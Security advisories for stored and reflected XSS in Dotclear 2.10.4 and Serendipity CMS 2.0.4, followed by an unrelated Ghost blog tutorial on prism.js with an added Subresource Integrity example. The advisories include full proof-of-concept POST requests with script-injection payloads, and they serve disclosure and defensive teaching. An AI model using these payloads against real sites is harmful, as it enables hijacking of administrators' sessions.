[CVE-2016-9891] Dotclear – XSS Vulnerability in Version 2.10.4


Product Information:

Software: Dotclear

Tested Version: 2.10.4, released 02.11.2016

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: The project’s purpose is to provide a user-friendly tool allowing anyone to publish on the web, regardless of their technical skills. (copied from https://dotclear.org/about#undefined)


Vulnerability description:

There is a stored XSS vulnerability in the /dotcl/admin/media_item.php page (the media item edit page).

When an authenticated user of Dotclear edits the title of a media file, the following POST request is sent to the server:

POST /dotcl/admin/media_item.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/dotcl/admin/media_item.php?id=4&plugin_id=&popup=0&select=0
Cookie: sidebar-pref=null; dcxd=0408528968495153b0822146207aaaa66d0118f0; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

media_file=testimage.png&media_title=<script>alert(0)</script>.png&media_dt=2016-11-25 19:12&popup=0&select=0&post_id=&id=4&xd_check=8850df45055dfadff791dfbbbd25ed16a16aa3ae

The parameter media_title is vulnerable to stored XSS: the title is saved as submitted and later rendered in the admin interface.

The payload is executed whenever an authenticated user opens the media manager at /dotcl/admin/media.php.

The same page is loaded when embedding an image or adding an attachment to an entry under Entries, so the payload triggers there as well.


Impact:

An attacker with an account that can edit media titles is able to inject malicious script into the otherwise trusted Dotclear admin interface, where it runs in the browser of every user who opens the media manager. The script can read any cookies not flagged HttpOnly, session tokens, or other sensitive information the browser holds for that site, and it can rewrite the contents of the page. Exploitation is straightforward to automate with BeEF (the Browser Exploitation Framework).


Solution:

Update to the latest version, which is 2.11.1 (fixed since 2.11), see https://dotclear.org/blog/post/2016/12/28/Dotclear-2.11


Timeline:

Vulnerability found: 26.11.2016

Vendor informed: 05.12.2016

Response by vendor: 05.12.2016

Fix by vendor: 05.12.2016

Patched version released: 28.12.2016

Public Advisory: 29.12.2016


References:

https://dev.dotclear.org/2.0/changeset/5536ac77e915

https://hg.dotclear.org/dotclear/rev/712559193a6e

[CVE-2016-9681] Serendipity CMS – XSS Vulnerability in Version 2.0.4


Product Information:

Software: Serendipity CMS

Tested Version: 2.0.4, released 26.09.2016

Vulnerability Type: Cross-Site Scripting (CWE-79)

Download link: https://github.com/s9y/Serendipity/releases/tag/2.0.4

Description: Serendipity is a PHP-powered weblog engine that gives the user an easy way to maintain a blog. While the default package is designed for the casual blogger, Serendipity offers an expandable framework with the power for professional applications. (copied from https://docs.s9y.org/)


Vulnerability description:

There are two XSS vulnerabilities in Serendipity CMS:

1) Stored XSS in the new category page (parameter serendipity[cat][name])

2) Reflected XSS in the create directory page (parameter serendipity[name])

Category Page


When an authenticated user of Serendipity CMS creates a new category, the following POST request is sent to the server:

POST /s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=9e3d614472aa8c3659f653b47fd193a31777f150; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 380

serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[cat][name]=<script>alert(0)</script>&serendipity[cat][description]=&serendipity[cat][parent_cat]=0&serendipity[cat][hide_sub]=0&serendipity[cat][read_authors][]=0&serendipity[cat][write_authors][]=0&serendipity[cat][icon]=&SAVE=Create

The parameter serendipity[cat][name] is vulnerable to stored XSS.

The stored payload is executed when an authenticated user subsequently opens the page to create another category.

Base Directory Page


When an authenticated user of Serendipity CMS creates a new base directory, the following POST request is sent to the server:

POST /s9y/serendipity_admin.php?serendipity[step]=directoryDoCreate&serendipity[adminModule]=images&serendipity[adminAction]=directoryDoCreate HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=images&serendipity[adminAction]=directoryCreate
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=31fd07e44a90a6bd7a8a03010660df86790eb948; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[name]=</script><svg onload=alert(0)>&serendipity[parent]=&SAVE=Create directory

The parameter serendipity[name] is vulnerable to reflected XSS.

The payload is executed once, in the response to the request that creates the directory; it does not fire again on later page loads.
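The two payloads in these advisories land in different output contexts: the Dotclear media_title value is rendered in an HTML body context, while the Serendipity directory name begins with </script>, the usual way to break out of a value reflected inside an inline script block (that context is an inference from the payload, not something the advisory states). The following is an added example, not code from Dotclear or Serendipity; the template functions are hypothetical stand-ins for the vulnerable and fixed rendering, and the check uses Python's own HTML tokenizer to show which encoding actually keeps the value inert in each context.

```python
"""Added example for the two advisories above (not code from Dotclear or
Serendipity): how the media_title and serendipity[name] payloads behave under
different output-encoding strategies, checked with Python's HTML tokenizer.
"""
import html
import json
from html.parser import HTMLParser

DOTCLEAR_TITLE = "<script>alert(0)</script>.png"      # media_title from the PoC
S9Y_DIRNAME = "</script><svg onload=alert(0)>"        # serendipity[name] from the PoC


# --- HTML body context (hypothetical templates, modelled on a media list) ---
def render_body_unsafe(value: str) -> str:
    return f"<td>{value}</td>"


def render_body_safe(value: str) -> str:
    # html.escape turns < > & " ' into entities; the browser shows them as text.
    return f"<td>{html.escape(value, quote=True)}</td>"


# --- Inline-script context (value placed in a JS string literal) ---
def render_script_naive(value: str) -> str:
    # Escaping quotes and backslashes is not enough: the HTML tokenizer ends
    # the script element at the first "</script", before any JS runs.
    escaped = value.replace("\\", "\\\\").replace('"', '\\"')
    return f'<script>var name = "{escaped}";</script>'


def render_script_safe(value: str) -> str:
    # json.dumps gives a valid JS string literal; rewriting "</" as "<\/"
    # (an identity escape in JS, so the value is unchanged) keeps the HTML
    # tokenizer from seeing a closing tag inside the literal.
    literal = json.dumps(value).replace("</", "<\\/")
    return f"<script>var name = {literal};</script>"


class TagCollector(HTMLParser):
    """Records every start tag the tokenizer sees. HTMLParser implements the
    'script data' state, so text inside <script> only ends at a real
    </script> tag, the same way a browser parses it."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def injected_tags(rendered: str, template_tags):
    """Start tags present in `rendered` beyond the ones the template emits.
    An empty list means the untrusted value stayed inert."""
    parser = TagCollector()
    parser.feed(rendered)
    parser.close()
    extra = list(parser.tags)
    for name in template_tags:           # drop one occurrence per template tag
        for idx, (tag, _) in enumerate(extra):
            if tag == name:
                del extra[idx]
                break
    return extra


if __name__ == "__main__":
    cases = [
        ("body/unsafe", render_body_unsafe(DOTCLEAR_TITLE), ("td",)),
        ("body/safe", render_body_safe(DOTCLEAR_TITLE), ("td",)),
        ("script/naive", render_script_naive(S9Y_DIRNAME), ("script",)),
        ("script/safe", render_script_safe(S9Y_DIRNAME), ("script",)),
    ]
    for label, page, own in cases:
        print(f"{label:13} injected={injected_tags(page, own)}")
```

The point the naive script-context renderer makes is the one the Serendipity payload exploits: the HTML parser runs before the JavaScript engine, so a value that is a perfectly escaped JS string can still terminate the script element. Encoding has to be chosen per output context, which is why a single "sanitise on input" pass is not a fix for either advisory.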


Impact:

An attacker with an account that can create categories or media directories is able to inject malicious script into the otherwise trusted Serendipity admin interface, where it runs in the browser of other authenticated users. The script can read any cookies not flagged HttpOnly, session tokens, or other sensitive information the browser holds for that site, and it can rewrite the contents of the page. Exploitation is straightforward to automate with BeEF (the Browser Exploitation Framework).


Solution:

Update to the latest version, which is 2.0.5, see https://blog.s9y.org/archives/271-Serendipity-2.0.5-and-2.1-beta3-released.html


Timeline:

Vulnerability found: 25.11.2016

Vendor informed: 26.11.2016

Response by vendor: 28.11.2016

Fix by vendor: 28.11.2016

Public Advisory: 03.12.2016


Reference:

https://github.com/s9y/Serendipity/commit/e2a665e13b7de82a71c9bbb77575d15131b722be

prismjs CDN: Implementation of Syntax Highlighting in Ghost CMS

Adding syntax highlighting is a must for any tech-related blog, and doing so should not be difficult. There are many syntax highlighters available, but I have settled on prism.js because it is lightweight and straightforward.

Besides, it is served through Cloudflare's CDN (cdnjs), which is a plus for speed.

Just look at this beauty.

Adding prism.js to the blog using the CDN

  1. Click the <> Code Injection button under Settings
  2. In the Blog Header section, add
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.4.1/themes/prism.min.css">

  3. In the Blog Footer section, add

<script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.4.1/prism.min.js"></script>
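The footer snippet loads prism.min.js from a third-party CDN with no integrity attribute, so the blog runs whatever cdnjs serves under that URL. Browsers support Subresource Integrity (SRI): with integrity="sha384-…" and crossorigin="anonymous" on the tag, the script is refused if its bytes differ from the recorded hash, and the same attribute works on the stylesheet link. The following is an added example, not code from the post or from the Prism project, that computes and checks such a value; the file bytes are a constructed stand-in, so hash the exact versioned prism.min.js you intend to load before pasting the tag into Code Injection.

```python
"""Added example (not from the original post): computing and verifying
Subresource Integrity (SRI) values for a script loaded from a CDN."""
import base64
import hashlib
import hmac

SUPPORTED = ("sha256", "sha384", "sha512")   # the algorithms SRI allows


def sri_hash(data: bytes, algorithm: str = "sha384") -> str:
    """Return an SRI integrity token, e.g. 'sha384-<base64 digest>'."""
    if algorithm not in SUPPORTED:
        raise ValueError(f"unsupported SRI algorithm: {algorithm}")
    digest = hashlib.new(algorithm, data).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(data: bytes, integrity: str) -> bool:
    """Check fetched bytes against an integrity attribute value.
    Simplification: any supported token that matches is accepted, whereas a
    browser only considers the strongest algorithm present."""
    for token in integrity.split():
        algorithm, _, _ = token.partition("-")
        if algorithm not in SUPPORTED:
            continue
        if hmac.compare_digest(sri_hash(data, algorithm), token):
            return True
    return False


def script_tag(src: str, data: bytes) -> str:
    """Render a <script> tag pinned to the given bytes. crossorigin="anonymous"
    is required for SRI checks on cross-origin resources."""
    return (f'<script src="{src}" integrity="{sri_hash(data)}" '
            f'crossorigin="anonymous"></script>')


# Constructed stand-in for the library file (not the real prism.min.js bytes).
SAMPLE_JS = b"/* demo */ window.Prism = window.Prism || {};\n"

if __name__ == "__main__":
    url = "https://cdnjs.cloudflare.com/ajax/libs/prism/1.4.1/prism.min.js"
    print(script_tag(url, SAMPLE_JS))
    pinned = sri_hash(SAMPLE_JS)
    print("original verifies:", verify_sri(SAMPLE_JS, pinned))
    print("tampered verifies:", verify_sri(SAMPLE_JS + b"alert(1);", pinned))
```

Pinning the hash also means a CDN-side update to the same URL (which should not happen for a versioned path, but has happened with compromised CDNs) breaks highlighting loudly in the console rather than silently executing new code; when you bump the Prism version, recompute the hash for the new file.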

Syntax highlighting using prism.js

Create a new entry with the following:

```language-markup
<h1>hello world!</h1>
```

It should render the following:

Note that if you are using Cloudflare's Rocket Loader, you should exclude these scripts from it (Cloudflare documents the data-cfasync="false" attribute on the script tag for this purpose), otherwise Rocket Loader may defer prism.js and the highlighting will not be applied. You can read more in Cloudflare's Rocket Loader documentation.